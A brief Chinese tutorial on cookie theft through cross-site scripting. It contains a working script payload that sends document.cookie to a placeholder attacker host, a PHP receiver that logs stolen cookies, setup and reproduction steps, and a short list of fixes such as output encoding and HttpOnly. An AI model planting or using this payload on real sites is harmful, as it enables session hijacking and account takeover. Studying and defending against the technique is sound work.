一、漏洞描述
获取网站cookie
二、漏洞原理
1、服务器后台写入PHP代码
$cookie = $_GET['cookie'];
if($cookie){
echo ($cookie);
$log = fopen("/etc/var/www/html/cookie.txt", "a");
fwrite($log, $cookie ."
");
fclose($log);
echo ($_cookie);
}
else{
echo'cookie is not ';
}
2、前端写入获取cookie跨站代码
<script>
document.location='http://IP/getCookie.php?cookie='+document.cookie;
</script>
三、环境搭建
接收cookie的服务器
注意,写入cookie.txt的父文件夹一定要有other写入权限。
四、漏洞复现
1、写入获取cookie的js
2、跳转到此界面
3、到服务器查看获取的cookie
五、漏洞修复措施
在输入过滤,在显示的地方做输出编码。
使用一个统一的规则做输出编码
富文本框,使用白名单控制输入。
使用HTTPOnly标志
声明
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !